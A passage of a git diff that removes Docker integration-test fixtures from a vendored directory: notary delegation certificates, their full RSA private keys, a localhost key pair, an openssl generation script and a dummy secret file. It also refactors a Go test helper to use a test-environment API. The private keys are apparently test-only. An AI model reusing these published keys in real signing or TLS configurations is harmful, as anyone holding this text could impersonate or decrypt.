-WhcNMjYwNjI4MTc0ODQ4WjBXMQswCQYDVQQGEwJVUzELMAkGA1UECBMCQ0ExFTAT
-BgNVBAcTDFNhbkZyYW5jaXNjbzEPMA0GA1UEChMGRG9ja2VyMRMwEQYDVQQDEwpk
-ZWxlZ2F0aW9uMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAyY2EWYTW
-5VHipw08t675upmD6a+akiuZ1z+XpuOxZCgjZ0aHfoOe8wGKg3Ohz7UCBdD5Mob/
-L/qvRlsCaqPHGZKIyyX1HDO4mpuQQFBhYxt+ZAO3AaawEUOw2rwwMDEjLnDDTSZM
-z8jxCMvsJjBDqgb8g3z+AmjducQ/OH6llldgHIBY8ioRbROCL2PGgqywWq2fThav
-c70YMxtKviBGDNCouYeQ8JMK/PuLwPNDXNQAagFHVARXiUv/ILHk7ImYnSGJUcuk
-JTUGN2MBnpY0eakg7i+4za8sjjqOdn+2I6aVzlGJDSiRP72nkg/cE4BqMl9FrMwK
-9iS8xa9yMDLUvwIDAQABo1QwUjAMBgNVHRMBAf8EAjAAMA4GA1UdDwEB/wQEAwIF
-oDATBgNVHSUEDDAKBggrBgEFBQcDAzAdBgNVHQ4EFgQUvQzzFmh3Sv3HcdExY3wx
-/1u6JLAwDQYJKoZIhvcNAQELBQADggEBAJcmDme2Xj/HPUPwaN/EyCmjhY73EiHO
-x6Pm16tscg5JGn5A+u3CZ1DmxUYl8Hp6MaW/sWzdtL0oKJg76pynadCWh5EacFR8
-u+2GV/IcN9mSX6JQzvrqbjSqo5/FehqBD+W5h3euwwApWA3STAadYeyEfmdOA3SQ
-W1vzrA1y7i8qgTqeJ7UX1sEAXlIhBK2zPYaMB+en+ZOiPyNxJYj6IDdGdD2paC9L
-6H9wKC+GAUTSdCWp89HP7ETSXEGr94AXkrwU+qNsiN+OyK8ke0EMngEPh5IQoplw
-/7zEZCth3oKxvR1/4S5LmTVaHI2ZlbU4q9bnY72G4tw8YQr2gcBGo4w=
------END CERTIFICATE-----
diff --git a/vendor/github.com/docker/docker/integration-cli/fixtures/notary/delgkey2.key b/vendor/github.com/docker/docker/integration-cli/fixtures/notary/delgkey2.key
deleted file mode 100644
index 5ccabe908f..0000000000
--- a/vendor/github.com/docker/docker/integration-cli/fixtures/notary/delgkey2.key
+++ /dev/null
@@ -1,27 +0,0 @@
------BEGIN RSA PRIVATE KEY-----
-MIIEogIBAAKCAQEAyY2EWYTW5VHipw08t675upmD6a+akiuZ1z+XpuOxZCgjZ0aH
-foOe8wGKg3Ohz7UCBdD5Mob/L/qvRlsCaqPHGZKIyyX1HDO4mpuQQFBhYxt+ZAO3
-AaawEUOw2rwwMDEjLnDDTSZMz8jxCMvsJjBDqgb8g3z+AmjducQ/OH6llldgHIBY
-8ioRbROCL2PGgqywWq2fThavc70YMxtKviBGDNCouYeQ8JMK/PuLwPNDXNQAagFH
-VARXiUv/ILHk7ImYnSGJUcukJTUGN2MBnpY0eakg7i+4za8sjjqOdn+2I6aVzlGJ
-DSiRP72nkg/cE4BqMl9FrMwK9iS8xa9yMDLUvwIDAQABAoIBAHmffvzx7ydESWwa
-zcfdu26BkptiTvjjfJrqEd4wSewxWGPKqJqMXE8xX99A2KTZClZuKuH1mmnecQQY
-iRXGrK9ewFMuHYGeKEiLlPlqR8ohXhyGLVm+t0JDwaXMp5t9G0i73O5iLTm5fNGd
-FGxa9YnVW20Q8MqNczbVGH1D1zInhxzzOyFzBd4bBBJ8PdrUdyLpd7+RxY2ghnbT
-p9ZANR2vk5zmDLJgZx72n/u+miJWuhY6p0v3Vq4z/HHgdhf+K6vpDdzTcYlA0rO4
-c/c+RKED3ZadGUD5QoLsmEN0e3FVSMPN1kt4ZRTqWfH8f2X4mLz33aBryTjktP6+
-1rX6ThECgYEA74wc1Tq23B5R0/GaMm1AK3Ko2zzTD8wK7NSCElh2dls02B+GzrEB
-aE3A2GMQSuzb+EA0zkipwANBaqs3ZemH5G1pu4hstQsXCMd4jAJn0TmTXlplXBCf
-PSc8ZUU6XcJENRr9Q7O9/TGlgahX+z0ndxYx/CMCsSu7XsMg4IZsbAcCgYEA12Vb
-wKOVG15GGp7pMshr+2rQfVimARUP4gf3JnQmenktI4PfdnMW3a4L3DEHfLhIerwT
-6lRp/NpxSADmuT4h1UO1l2lc+gmTVPw0Vbl6VwHpgS5Kfu4ZyM6n3S66f/dE4nu7
-hQF9yZz7vn5Agghak4p6a1wC1gdMzR1tvxFzk4kCgYByBMTskWfcWeok8Yitm+bB
-R3Ar+kWT7VD97SCETusD5uG+RTNLSmEbHnc+B9kHcLo67YS0800pAeOvPBPARGnU
-RmffRU5I1iB+o0MzkSmNItSMQoagTaEd4IEUyuC/I+qHRHNsOC+kRm86ycAm67LP
-MhdUpe1wGxqyPjp15EXTHQKBgDKzFu+3EWfJvvKRKQ7dAh3BvKVkcl6a2Iw5l8Ej
-YdM+JpPPfI/i8yTmzL/dgoem0Nii4IUtrWzo9fUe0TAVId2S/HFRSaNJEbbVTnRH
-HjbQqmfPv5U08jjD+9siHp/0UfCFc1QRT8xe+RqTmReCY9+KntoaZEiAm2FEZgqt
-TukRAoGAf7QqbTP5/UH1KSkX89F5qy/6GS3pw6TLj9Ufm/l/NO8Um8gag6YhEKWR
-7HpkpCqjfWj8Av8ESR9cqddPGrbdqXFm9z7dCjlAd5T3Q3h/h+v+JzLQWbsI6WOb
-SsOSWNyE006ZZdIiFwO6GfxpLI24sVtYKgyob6Q71oxSqfnrnT0=
------END RSA PRIVATE KEY-----
diff --git a/vendor/github.com/docker/docker/integration-cli/fixtures/notary/delgkey3.crt b/vendor/github.com/docker/docker/integration-cli/fixtures/notary/delgkey3.crt
deleted file mode 100644
index f434b45fc8..0000000000
--- a/vendor/github.com/docker/docker/integration-cli/fixtures/notary/delgkey3.crt
+++ /dev/null
@@ -1,21 +0,0 @@
------BEGIN CERTIFICATE-----
-MIIDhTCCAm2gAwIBAgIJAKHt/jxiWqMtMA0GCSqGSIb3DQEBCwUAMFcxCzAJBgNV
-BAYTAlVTMQswCQYDVQQIEwJDQTEVMBMGA1UEBxMMU2FuRnJhbmNpc2NvMQ8wDQYD
-VQQKEwZEb2NrZXIxEzARBgNVBAMTCmRlbGVnYXRpb24wHhcNMTYwOTI4MTc0ODQ5
-WhcNMjYwNjI4MTc0ODQ5WjBXMQswCQYDVQQGEwJVUzELMAkGA1UECBMCQ0ExFTAT
-BgNVBAcTDFNhbkZyYW5jaXNjbzEPMA0GA1UEChMGRG9ja2VyMRMwEQYDVQQDEwpk
-ZWxlZ2F0aW9uMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAqfbJk2Dk
-C9FJVjV2+Q2CQrJphG3vFc1Qlu9jgVA5RhGmF9jJzetsclsV/95nBhinIGcSmPQA
-l318G7Bz/cG/6O2n5+hj+S1+YOvQweReZj3d4kCeS86SOyLNTpMD9gsF0S8nR1RN
-h0jD4t1vxAVeGD1o61U8/k0O5eDoeOfOSWZagKk5PhyrMZgNip4IrG46umCkFlrw
-zMMcgQdwTQXywPqkr/LmYpqT1WpMlzHYTQEY8rKorIJQbPtHVYdr4UxYnNmk6fbU
-biEP1DQlwjBWcFTsDLqXKP/K+e3O0/e/hMB0y7Tj9fZ7Viw0t5IKXZPsxMhwknUT
-9vmPzIJO6NiniwIDAQABo1QwUjAMBgNVHRMBAf8EAjAAMA4GA1UdDwEB/wQEAwIF
-oDATBgNVHSUEDDAKBggrBgEFBQcDAzAdBgNVHQ4EFgQUdTXRP1EzxQ+UDZSoheVo
-Mobud1cwDQYJKoZIhvcNAQELBQADggEBADV9asTWWdbmpkeRuKyi0xGho39ONK88
-xxkFlco766BVgemo/rGQj3oPuw6M6SzHFoJ6JUPjmLiAQDIGEU/2/b6LcOuLjP+4
-YejCcDTY3lSW/HMNoAmzr2foo/LngNGfe/qhVFUqV7GjFT9+XzFFBfIZ1cQiL2ed
-kc8rgQxFPwWXFCSwaENWeFnMDugkd+7xanoAHq8GsJpg5fTruDTmJkUqC2RNiMLn
-WM7QaqW7+lmUnMnc1IBoz0hFhgoiadWM/1RQxx51zTVw6Au1koIm4ZXu5a+/WyC8
-K1+HyUbc0AVaDaRBpRSOR9aHRwLGh6WQ4aUZQNyJroc999qfYrDEEV8=
------END CERTIFICATE-----
diff --git a/vendor/github.com/docker/docker/integration-cli/fixtures/notary/delgkey3.key b/vendor/github.com/docker/docker/integration-cli/fixtures/notary/delgkey3.key
deleted file mode 100644
index a61d18cc3d..0000000000
--- a/vendor/github.com/docker/docker/integration-cli/fixtures/notary/delgkey3.key
+++ /dev/null
@@ -1,27 +0,0 @@
------BEGIN RSA PRIVATE KEY-----
-MIIEpQIBAAKCAQEAqfbJk2DkC9FJVjV2+Q2CQrJphG3vFc1Qlu9jgVA5RhGmF9jJ
-zetsclsV/95nBhinIGcSmPQAl318G7Bz/cG/6O2n5+hj+S1+YOvQweReZj3d4kCe
-S86SOyLNTpMD9gsF0S8nR1RNh0jD4t1vxAVeGD1o61U8/k0O5eDoeOfOSWZagKk5
-PhyrMZgNip4IrG46umCkFlrwzMMcgQdwTQXywPqkr/LmYpqT1WpMlzHYTQEY8rKo
-rIJQbPtHVYdr4UxYnNmk6fbUbiEP1DQlwjBWcFTsDLqXKP/K+e3O0/e/hMB0y7Tj
-9fZ7Viw0t5IKXZPsxMhwknUT9vmPzIJO6NiniwIDAQABAoIBAQCAr/ed3A2umO7T
-FDYZik3nXBiiiW4t7r+nGGgZ3/kNgY1lnuHlROxehXLZwbX1mrLnyML/BjhwezV9
-7ZNVPd6laVPpNj6DyxtWHRZ5yARlm1Al39E7CpQTrF0QsiWcpGnqIa62xjDRTpnq
-askV/Q5qggyvqmE9FnFCQpEiAjlhvp7F0kVHVJm9s3MK3zSyR0UTZ3cpYus2Jr2z
-OotHgAMHq5Hgb3dvxOeE2xRMeYAVDujbkNzXm2SddAtiRdLhWDh7JIr3zXhp0HyN
-4rLOyhlgz00oIGeDt/C0q3fRmghr3iZOG+7m2sUx0FD1Ru1dI9v2A+jYmIVNW6+x
-YJk5PzxJAoGBANDj7AGdcHSci/LDBPoTTUiz3uucAd27/IJma/iy8mdbVfOAb0Fy
-PRSPvoozlpZyOxg2J4eH/o4QxQR4lVKtnLKZLNHK2tg3LarwyBX1LiI3vVlB+DT1
-AmV8i5bJAckDhqFeEH5qdWZFi03oZsSXWEqX5iMYCrdK5lTZggcrFZeHAoGBANBL
-fkk3knAdcVfTYpmHx18GBi2AsCWTd20KD49YBdbVy0Y2Jaa1EJAmGWpTUKdYx40R
-H5CuGgcAviXQz3bugdTU1I3tAclBtpJNU7JkhuE+Epz0CM/6WERJrE0YxcGQA5ui
-6fOguFyiXD1/85jrDBOKy74aoS7lYz9r/a6eqmjdAoGBAJpm/nmrIAZx+Ff2ouUe
-A1Ar9Ch/Zjm5zEmu3zwzOU4AiyWz14iuoktifNq2iyalRNz+mnVpplToPFizsNwu
-C9dPtXtU0DJlhtIFrD/evLz6KnGhe4/ZUm4lgyBvb2xfuNHqL5Lhqelwmil6EQxb
-Oh3Y7XkfOjyFln89TwlxZUJdAoGAJRMa4kta7EvBTeGZLjyltvsqhFTghX+vBSCC
-ToBbYbbiHJgssXSPAylU4sD7nR3HPwuqM6VZip+OOMrm8oNXZpuPTce+xqTEq1vK
-JvmPrG3RAFDLdMFZjqYSXhKnuGE60yv3Ol8EEbDwfB3XLQPBPYU56Jdy0xcPSE2f
-dMJXEJ0CgYEAisZw0nXw6lFeYecu642EGuU0wv1O9i21p7eho9QwOcsoTl4Q9l+M
-M8iBv+qTHO+D19l4JbkGvy2H2diKoYduUFACcuiFYs8fjrT+4Z6DyOQAQGAf6Ylw
-BFbU15k6KbA9v4mZDfd1tY9x62L/XO55ZxYG+J+q0e26tEThgD8cEog=
------END RSA PRIVATE KEY-----
diff --git a/vendor/github.com/docker/docker/integration-cli/fixtures/notary/delgkey4.crt b/vendor/github.com/docker/docker/integration-cli/fixtures/notary/delgkey4.crt
deleted file mode 100644
index c8cbe46bdf..0000000000
--- a/vendor/github.com/docker/docker/integration-cli/fixtures/notary/delgkey4.crt
+++ /dev/null
@@ -1,21 +0,0 @@
------BEGIN CERTIFICATE-----
-MIIDhTCCAm2gAwIBAgIJANae++ZkUEWMMA0GCSqGSIb3DQEBCwUAMFcxCzAJBgNV
-BAYTAlVTMQswCQYDVQQIEwJDQTEVMBMGA1UEBxMMU2FuRnJhbmNpc2NvMQ8wDQYD
-VQQKEwZEb2NrZXIxEzARBgNVBAMTCmRlbGVnYXRpb24wHhcNMTYwOTI4MTc0ODQ5
-WhcNMjYwNjI4MTc0ODQ5WjBXMQswCQYDVQQGEwJVUzELMAkGA1UECBMCQ0ExFTAT
-BgNVBAcTDFNhbkZyYW5jaXNjbzEPMA0GA1UEChMGRG9ja2VyMRMwEQYDVQQDEwpk
-ZWxlZ2F0aW9uMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAqULAjgba
-Y2I10WfqdmYnPfEqEe6iMDbzcgECb2xKafXcI4ltkQj1iO4zBTs0Ft9EzXFc5ZBh
-pTjZrL6vrIa0y/CH2BiIHBJ0wRHx/40HXp4DSj3HZpVOlEMI3npRfBGNIBllUaRN
-PWG7zL7DcKMIepBfPXyjBsxzH3yNiISq0W5hSiy+ImhSo3aipJUHHcp9Z9NgvpNC
-3QvnxsGKRnECmDRDlxkq+FQu9Iqs/HWFYWgyfcsw+YTrWZq3qVnnqUouHO//c9PG
-Ry3sZSDU97MwvkjvWys1e01Xvd3AbHx08YAsxih58i/OBKe81eD9NuZDP2KrjTxI
-5xkXKhj6DV2NnQIDAQABo1QwUjAMBgNVHRMBAf8EAjAAMA4GA1UdDwEB/wQEAwIF
-oDATBgNVHSUEDDAKBggrBgEFBQcDAzAdBgNVHQ4EFgQUDt95hiqbQvi0KcvZGAUu
-VisnztQwDQYJKoZIhvcNAQELBQADggEBAGi7qHai7MWbfeu6SlXhzIP3AIMa8TMi
-lp/+mvPUFPswIVqYJ71MAN8uA7CTH3z50a2vYupGeOEtZqVJeRf+xgOEpwycncxp
-Qz6wc6TWPVIoT5q1Hqxw1RD2MyKL+Y+QBDYwFxFkthpDMlX48I9frcqoJUWFxBF2
-lnRr/cE7BbPE3sMbXV3wGPlH7+eUf+CgzXJo2HB6THzagyEgNrDiz/0rCQa1ipFd
-mNU3D/U6BFGmJNxhvSOtXX9escg8yjr05YwwzokHS2K4jE0ZuJPBd50C/Rvo3Mf4
-0h7/2Q95e7d42zPe9WYPu2F8KTWsf4r+6ddhKrKhYzXIcTAfHIOiO+U=
------END CERTIFICATE-----
diff --git a/vendor/github.com/docker/docker/integration-cli/fixtures/notary/delgkey4.key b/vendor/github.com/docker/docker/integration-cli/fixtures/notary/delgkey4.key
deleted file mode 100644
index f473cc495a..0000000000
--- a/vendor/github.com/docker/docker/integration-cli/fixtures/notary/delgkey4.key
+++ /dev/null
@@ -1,27 +0,0 @@
------BEGIN RSA PRIVATE KEY-----
-MIIEpAIBAAKCAQEAqULAjgbaY2I10WfqdmYnPfEqEe6iMDbzcgECb2xKafXcI4lt
-kQj1iO4zBTs0Ft9EzXFc5ZBhpTjZrL6vrIa0y/CH2BiIHBJ0wRHx/40HXp4DSj3H
-ZpVOlEMI3npRfBGNIBllUaRNPWG7zL7DcKMIepBfPXyjBsxzH3yNiISq0W5hSiy+
-ImhSo3aipJUHHcp9Z9NgvpNC3QvnxsGKRnECmDRDlxkq+FQu9Iqs/HWFYWgyfcsw
-+YTrWZq3qVnnqUouHO//c9PGRy3sZSDU97MwvkjvWys1e01Xvd3AbHx08YAsxih5
-8i/OBKe81eD9NuZDP2KrjTxI5xkXKhj6DV2NnQIDAQABAoIBAGK0ZKnuYSiXux60
-5MvK4pOCsa/nY3mOcgVHhW4IzpRgJdIrcFOlz9ncXrBsSAIWjX7o3u2Ydvjs4DOW
-t8d6frB3QiDInYcRVDjLCD6otWV97Bk9Ua0G4N4hAWkMF7ysV4oihS1JDSoAdo39
-qOdki6s9yeyHZGKwk2oHLlowU5TxQMBA8DHmxqBII1HTm+8xRz45bcEqRXydYSUn
-P1JuSU9jFqdylxU+Nrq6ehslMQ3y7qNWQyiLGxu6EmR+vgrzSU0s3iAOqCHthaOS
-VBBXPL3DNEYUS+0QGnGrACuJhanOMBfdiO6Orelx6ZzWZm38PNGv0yBt0WCM+8/A
-TtQNGkECgYEA1LqR6AH9XikUQ0+rM4526BgVuYqtjw21h4Lj9alaA+YTQntBBJOv
-iAcUpnJiV4T8jzAMLeqpK8R/rbxRnK5S9jOV2gr+puk4L6tH46cgahBUESDigDp8
-6vK8ur6ubBcXNPh3AT6rsPj+Ph2EU3raqiYdouvCdga/OCYZb+jr6UkCgYEAy7Cr
-l8WssI/8/ORcQ4MFJFNyfz/Y2beNXyLd1PX0H+wRSiGcKzeUuTHNtzFFpMbrK/nx
-ZOPCT2ROdHsBHzp1L+WquCb0fyMVSiYiXBU+VCFDbUU5tBr3ycTc7VwuFPENOiha
-IdlWgew/aW110FQHIaqe9g+htRe+mXe++faZtbUCgYB/MSJmNzJX53XvHSZ/CBJ+
-iVAMBSfq3caJRLCqRNzGcf1YBbwFUYxlZ95n+wJj0+byckcF+UW3HqE8rtmZNf3y
-qTtTCLnj8JQgpGeybU4LPMIXD7N9+fqQvBwuCC7gABpnGJyHCQK9KNNTLnDdPRqb
-G3ki3ZYC3dvdZaJV8E2FyQKBgQCMa5Mf4kqWvezueo+QizZ0QILibqWUEhIH0AWV
-1qkhiKCytlDvCjYhJdBnxjP40Jk3i+t6XfmKud/MNTAk0ywOhQoYQeKz8v+uSnPN
-f2ekn/nXzq1lGGJSWsDjcXTjQvqXaVIZm7cjgjaE+80IfaUc9H75qvUT3vaq3f5u
-XC7DMQKBgQDMAzCCpWlEPbZoFMl6F49+7jG0/TiqM/WRUSQnNtufPMbrR9Je4QM1
-L1UCANCPaHFOncKYer15NfIV1ctt5MZKImevDsUaQO8CUlO+dzd5H8KvHw9E29gA
-B22v8k3jIjsYeRL+UJ/sBnWHgxdAe/NEM+TdlP2oP9D1gTifutPqAg==
------END RSA PRIVATE KEY-----
diff --git a/vendor/github.com/docker/docker/integration-cli/fixtures/notary/gen.sh b/vendor/github.com/docker/docker/integration-cli/fixtures/notary/gen.sh
deleted file mode 100755
index 8d6381cec4..0000000000
--- a/vendor/github.com/docker/docker/integration-cli/fixtures/notary/gen.sh
+++ /dev/null
@@ -1,18 +0,0 @@
-for selfsigned in delgkey1 delgkey2 delgkey3 delgkey4; do
-        subj='/C=US/ST=CA/L=SanFrancisco/O=Docker/CN=delegation'
-
-        openssl genrsa -out "${selfsigned}.key" 2048
-        openssl req -new -key "${selfsigned}.key" -out "${selfsigned}.csr" -sha256 -subj "${subj}"
-        cat > "${selfsigned}.cnf" <<EOL
-[selfsigned]
-basicConstraints = critical,CA:FALSE
-keyUsage = critical, digitalSignature, keyEncipherment
-extendedKeyUsage=codeSigning
-subjectKeyIdentifier=hash
-EOL
-
-        openssl x509 -req -days 3560 -in "${selfsigned}.csr" -signkey "${selfsigned}.key" -sha256 \
-                -out "${selfsigned}.crt" -extfile "${selfsigned}.cnf" -extensions selfsigned
-
-        rm "${selfsigned}.cnf" "${selfsigned}.csr"
-done
diff --git a/vendor/github.com/docker/docker/integration-cli/fixtures/notary/localhost.cert b/vendor/github.com/docker/docker/integration-cli/fixtures/notary/localhost.cert
deleted file mode 100644
index d1233a1b06..0000000000
--- a/vendor/github.com/docker/docker/integration-cli/fixtures/notary/localhost.cert
+++ /dev/null
@@ -1,19 +0,0 @@
------BEGIN CERTIFICATE-----
-MIIDCTCCAfOgAwIBAgIQTOoFF+ypXwgdXnXHuCTvYDALBgkqhkiG9w0BAQswJjER
-MA8GA1UEChMIUXVpY2tUTFMxETAPBgNVBAMTCFF1aWNrVExTMB4XDTE1MDcxNzE5
-NDg1M1oXDTE4MDcwMTE5NDg1M1owJzERMA8GA1UEChMIUXVpY2tUTFMxEjAQBgNV
-BAMTCWxvY2FsaG9zdDCCASIwDQYJKoZIhvcNAQEBBQADggEPADCCAQoCggEBAMDO
-qvTBAi0ApXLfe90ApJkdkRGwF838Qzt1UFSxomu5fHRV6l3FjX5XCVHiFQ4w3ROh
-dMOu9NahfGLJv9VvWU2MV3YoY9Y7lIXpKwnK1v064wuls4nPh13BUWKQKofcY/e2
-qaSPd6/qmSRc/kJUvOI9jZMSX6ZRPu9K4PCqm2CivlbLq9UYuo1AbRGfuqHRvTxg
-mQG7WQCzGSvSjuSg5qX3TEh0HckTczJG9ODULNRWNE7ld0W4sfv4VF8R7Uc/G7LO
-8QwLCZ9TIl3gYMPCrhUL3Q6z9Jnn1SQS4mhDnPi6ugRYO1X8k3jjdxV9C2sXwUvN
-OZI1rLEWl9TJNA7ZXtMCAwEAAaM2MDQwDgYDVR0PAQH/BAQDAgCgMAwGA1UdEwEB
-/wQCMAAwFAYDVR0RBA0wC4IJbG9jYWxob3N0MAsGCSqGSIb3DQEBCwOCAQEAH6iq
-kM2+UMukGDLEQKHHiauioWJlHDlLXv76bJiNfjSz94B/2XOQMb9PT04//tnGUyPK
-K8Dx7RoxSodU6T5VRiz/A36mLOvt2t3bcL/1nHf9sAOHcexGtnCbQbW91V7RKfIL
-sjiLNFDkQ9VfVNY+ynQptZoyH1sy07+dplfkIiPzRs5WuVAnEGsX3r6BrhgUITzi
-g1B4kpmGZIohP4m6ZEBY5xuo/NQ0+GhjAENQMU38GpuoMyFS0i0dGcbx8weqnI/B
-Er/qa0+GE/rBnWY8TiRow8dzpneSFQnUZpJ4EwD9IoOIDHo7k2Nbz2P50HMiCXZf
-4RqzctVssRlrRVnO5w==
------END CERTIFICATE-----
diff --git a/vendor/github.com/docker/docker/integration-cli/fixtures/notary/localhost.key b/vendor/github.com/docker/docker/integration-cli/fixtures/notary/localhost.key
deleted file mode 100644
index d7778359a3..0000000000
--- a/vendor/github.com/docker/docker/integration-cli/fixtures/notary/localhost.key
+++ /dev/null
@@ -1,27 +0,0 @@
------BEGIN RSA PRIVATE KEY-----
-MIIEogIBAAKCAQEAwM6q9MECLQClct973QCkmR2REbAXzfxDO3VQVLGia7l8dFXq
-XcWNflcJUeIVDjDdE6F0w6701qF8Ysm/1W9ZTYxXdihj1juUhekrCcrW/TrjC6Wz
-ic+HXcFRYpAqh9xj97appI93r+qZJFz+QlS84j2NkxJfplE+70rg8KqbYKK+Vsur
-1Ri6jUBtEZ+6odG9PGCZAbtZALMZK9KO5KDmpfdMSHQdyRNzMkb04NQs1FY0TuV3
-Rbix+/hUXxHtRz8bss7xDAsJn1MiXeBgw8KuFQvdDrP0mefVJBLiaEOc+Lq6BFg7
-VfyTeON3FX0LaxfBS805kjWssRaX1Mk0Dtle0wIDAQABAoIBAHbuhNHZROhRn70O
-Ui9vOBki/dt1ThnH5AkHQngb4t6kWjrAzILvW2p1cdBKr0ZDqftz+rzCbVD/5+Rg
-Iq8bsnB9g23lWEBMHD/GJsAxmRA3hNooamk11IBmwTcVSsbnkdq5mEdkICYphjHC
-Ey0DbEf6RBxWlx3WvAWLoNmTw6iFaOCH8IyLavPpe7kLbZc219oNUw2qjCnCXCZE
-/NuViADHJBPN8r7g1gmyclJmTumdUK6oHgXEMMPe43vhReGcgcReK9QZjnTcIXPM
-4oJOraw+BtoZXVvvIPnC+5ntoLFOzjIzM0kaveReZbdgffqF4zy2vRfCHhWssanc
-7a0xR4ECgYEA3Xuvcqy5Xw+v/jVCO0VZj++Z7apA78dY4tWsPx5/0DUTTziTlXkC
-ADduEbwX6HgZ/iLvA9j4C3Z4mO8qByby/6UoBU8NEe+PQt6fT7S+dKSP4uy5ZxVM
-i5opkEyrJsMbve9Jrlj4bk5CICsydrZ+SBFHnpNGjbduGQick5LORWECgYEA3trt
-gepteDGiUYmnnBgjbYtcD11RvpKC8Z/QwGnzN5vk4eBu8r7DkMcLN+SiHjAovlJo
-r5j3EbF8sla1zBf/yySdQZFqUGcwtw7MaAKCLdhQl5WsViNMIx6p2OJapu0dzbv2
-KTXrnoRCafcH92k0dUX1ahE9eyc8KX6VhbWwXLMCgYATGCCuEDoC+gVAMzM8jOQF
-xrBMjwr+IP+GvskUv/pg5tJ9V/FRR5dmkWDJ4p9lCUWkZTqZ6FCqHFKVTLkg2LjG
-VWS34HLOAwskxrCRXJG22KEW/TWWr31j46yFpjZzJwrzOvftMfpo+BI3V8IH/f+x
-EtxLzYKdoRy6x8VH67YgwQKBgHor2vjV45142FuK83AHa6SqOZXSuvWWrGJ6Ep7p
-doSN2jRaLXi2S9AaznOdy6JxFGUCGJHrcccpXgsGrjNtFLXxJKTFa1sYtwQkALsk
-ZOltJQF09D1krGC0driHntrUMvqOiKye+sS0DRS6cIuaCUAhUiELwoC5SaoV0zKy
-IDUxAoGAOK8Xq+3/sqe79vTpw25RXl+nkAmOAeKjqf3Kh6jbnBhr81rmefyKXB9a
-uj0b980tzUnliwA5cCOsyxfN2vASvMnJxFE721QZI04arlcPFHcFqCtmNnUYTcLp
-0hgn/yLZptcoxpy+eTBu3eNsxz1Bu/Tx/198+2Wr3MbtGpLNIcA=
------END RSA PRIVATE KEY-----
diff --git a/vendor/github.com/docker/docker/integration-cli/fixtures/secrets/default b/vendor/github.com/docker/docker/integration-cli/fixtures/secrets/default
deleted file mode 100644
index e8ca7d8874..0000000000
--- a/vendor/github.com/docker/docker/integration-cli/fixtures/secrets/default
+++ /dev/null
@@ -1 +0,0 @@
-this is the secret
diff --git a/vendor/github.com/docker/docker/integration-cli/fixtures_linux_daemon.go b/vendor/github.com/docker/docker/integration-cli/fixtures_linux_daemon_test.go
similarity index 79%
rename from vendor/github.com/docker/docker/integration-cli/fixtures_linux_daemon.go
rename to vendor/github.com/docker/docker/integration-cli/fixtures_linux_daemon_test.go
index b9484f3a2a..2387a9ebee 100644
--- a/vendor/github.com/docker/docker/integration-cli/fixtures_linux_daemon.go
+++ b/vendor/github.com/docker/docker/integration-cli/fixtures_linux_daemon_test.go
@@ -9,23 +9,19 @@ import (
 	"runtime"
 	"strings"
 	"sync"
-	"testing"
 
-	"github.com/docker/docker/integration-cli/fixtures/load"
-	"github.com/docker/docker/pkg/integration/checker"
+	"github.com/docker/docker/integration-cli/checker"
+	"github.com/docker/docker/internal/test/fixtures/load"
 	"github.com/go-check/check"
 )
 
-func ensureFrozenImagesLinux(t *testing.T) {
-	images := []string{"busybox:latest", "hello-world:frozen", "debian:jessie"}
-	err := load.FrozenImagesLinux(dockerBinary, images...)
-	if err != nil {
-		t.Log(dockerCmdWithError("images"))
-		t.Fatalf("%+v", err)
-	}
-	for _, img := range images {
-		protectedImages[img] = struct{}{}
-	}
+type testingT interface {
+	logT
+	Fatalf(string, ...interface{})
+}
+
+type logT interface {
+	Logf(string, ...interface{})
 }
 
 var ensureSyscallTestOnce sync.Once
@@ -38,11 +34,11 @@ func ensureSyscallTest(c *check.C) {
 	if !doIt {
 		return
 	}
-	protectedImages["syscall-test:latest"] = struct{}{}
+	defer testEnv.ProtectImage(c, "syscall-test:latest")
 
 	// if no match, must build in docker, which is significantly slower
 	// (slower mostly because of the vfs graphdriver)
-	if daemonPlatform != runtime.GOOS {
+	if testEnv.OSType != runtime.GOOS {
 		ensureSyscallTestBuild(c)
 		return
 	}
@@ -61,7 +57,7 @@ func ensureSyscallTest(c *check.C) {
 	}
 
 	if runtime.GOOS == "linux" && runtime.GOARCH == "amd64" {
-		out, err := exec.Command(gcc, "-s", "-m32", "-nostdlib", "../contrib/syscall-test/exit32.s", "-o", tmp+"/"+"exit32-test").CombinedOutput()
+		out, err := exec.Command(gcc, "-s", "-m32", "-nostdlib", "-static", "../contrib/syscall-test/exit32.s", "-o", tmp+"/"+"exit32-test").CombinedOutput()
 		c.Assert(err, checker.IsNil, check.Commentf(string(out)))
 	}
 
@@ -83,7 +79,7 @@ func ensureSyscallTest(c *check.C) {
 }
 
 func ensureSyscallTestBuild(c *check.C) {
-	err := load.FrozenImagesLinux(dockerBinary, "buildpack-deps:jessie")
+	err := load.FrozenImagesLinux(testEnv.APIClient(), "buildpack-deps:jessie")
 	c.Assert(err, checker.IsNil)
 
 	var buildArgs []string
@@ -96,8 +92,8 @@ func ensureSyscallTestBuild(c *check.C) {
 }
 
 func ensureNNPTest(c *check.C) {
-	protectedImages["nnp-test:latest"] = struct{}{}
-	if daemonPlatform != runtime.GOOS {
+	defer testEnv.ProtectImage(c, "nnp-test:latest")
+	if testEnv.OSType != runtime.GOOS {
 		ensureNNPTestBuild(c)
 		return
 	}
@@ -130,7 +126,7 @@ func ensureNNPTest(c *check.C) {
 }
 
 func ensureNNPTestBuild(c *check.C) {
-	err := load.FrozenImagesLinux(dockerBinary, "buildpack-deps:jessie")
+	err := load.FrozenImagesLinux(testEnv.APIClient(), "buildpack-deps:jessie")
 	c.Assert(err, checker.IsNil)
 
 	var buildArgs []string
diff --git a/vendor/github.com/docker/docker/integration-cli/registry.go b/vendor/github.com/docker/docker/integration-cli/registry.go
deleted file mode 100644
index 5181570af5..0000000000
--- a/vendor/github.com/docker/docker/integration-cli/registry.go
+++ /dev/null
@@ -1,177 +0,0 @@
-package main
-
-import (
-	"fmt"
-	"io/ioutil"
-	"net/http"
-	"os"
-	"os/exec"
-	"path/filepath"
-
-	"github.com/docker/distribution/digest"
-	"github.com/go-check/check"
-)
-
-const (
-	v2binary        = "registry-v2"
-	v2binarySchema1 = "registry-v2-schema1"
-)
-
-type testRegistryV2 struct {
-	cmd      *exec.Cmd
-	dir      string
-	auth     string
-	username string
-	password string
-	email    string
-}
-
-func newTestRegistryV2(c *check.C, schema1 bool, auth, tokenURL string) (*testRegistryV2, error) {
